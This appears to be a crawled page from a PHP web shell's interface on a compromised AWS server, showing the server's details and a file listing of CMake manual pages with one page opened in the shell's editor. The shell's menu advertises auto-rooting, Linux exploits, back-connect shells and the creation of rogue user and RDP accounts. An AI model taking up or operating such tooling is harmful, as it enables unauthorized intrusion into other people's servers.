Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.12.123.254
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
cmake-3.16 /
Help /
manual /
[ HOME SHELL ]
Name
Size
Permission
Action
LINKS.txt
430
B
-rw-r--r--
OPTIONS_BUILD.txt
4.65
KB
-rw-r--r--
OPTIONS_HELP.txt
3.55
KB
-rw-r--r--
ccmake.1.rst
889
B
-rw-r--r--
cmake-buildsystem.7.rst
38.37
KB
-rw-r--r--
cmake-commands.7.rst
4.01
KB
-rw-r--r--
cmake-compile-features.7.rst
13.08
KB
-rw-r--r--
cmake-developer.7.rst
14.89
KB
-rw-r--r--
cmake-env-variables.7.rst
1.62
KB
-rw-r--r--
cmake-file-api.7.rst
39.61
KB
-rw-r--r--
cmake-generator-expressions.7....
26.41
KB
-rw-r--r--
cmake-generators.7.rst
2.98
KB
-rw-r--r--
cmake-gui.1.rst
1.12
KB
-rw-r--r--
cmake-language.7.rst
19.13
KB
-rw-r--r--
cmake-modules.7.rst
7.42
KB
-rw-r--r--
cmake-packages.7.rst
27.11
KB
-rw-r--r--
cmake-policies.7.rst
12.05
KB
-rw-r--r--
cmake-properties.7.rst
16.35
KB
-rw-r--r--
cmake-qt.7.rst
10.04
KB
-rw-r--r--
cmake-server.7.rst
21.75
KB
-rw-r--r--
cmake-toolchains.7.rst
25.04
KB
-rw-r--r--
cmake-variables.7.rst
23.56
KB
-rw-r--r--
cmake.1.rst
21.58
KB
-rw-r--r--
cpack-generators.7.rst
476
B
-rw-r--r--
cpack.1.rst
4.19
KB
-rw-r--r--
ctest.1.rst
53.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmake-gui.1.rst
.. cmake-manual-description: CMake GUI Command-Line Reference cmake-gui(1) ************ Synopsis ======== .. parsed-literal:: cmake-gui [<options>] cmake-gui [<options>] {<path-to-source> | <path-to-existing-build>} cmake-gui [<options>] -S <path-to-source> -B <path-to-build> Description =========== The **cmake-gui** executable is the CMake GUI. Project configuration settings may be specified interactively. Brief instructions are provided at the bottom of the window when the program is running. CMake is a cross-platform build system generator. Projects specify their build process with platform-independent CMake listfiles included in each directory of a source tree with the name ``CMakeLists.txt``. Users build a project by using CMake to generate a build system for a native tool on their platform. Options ======= ``-S <path-to-source>`` Path to root directory of the CMake project to build. ``-B <path-to-build>`` Path to directory which CMake will use as the root of build directory. If the directory doesn't already exist CMake will make it. .. include:: OPTIONS_HELP.txt See Also ======== .. include:: LINKS.txt
Close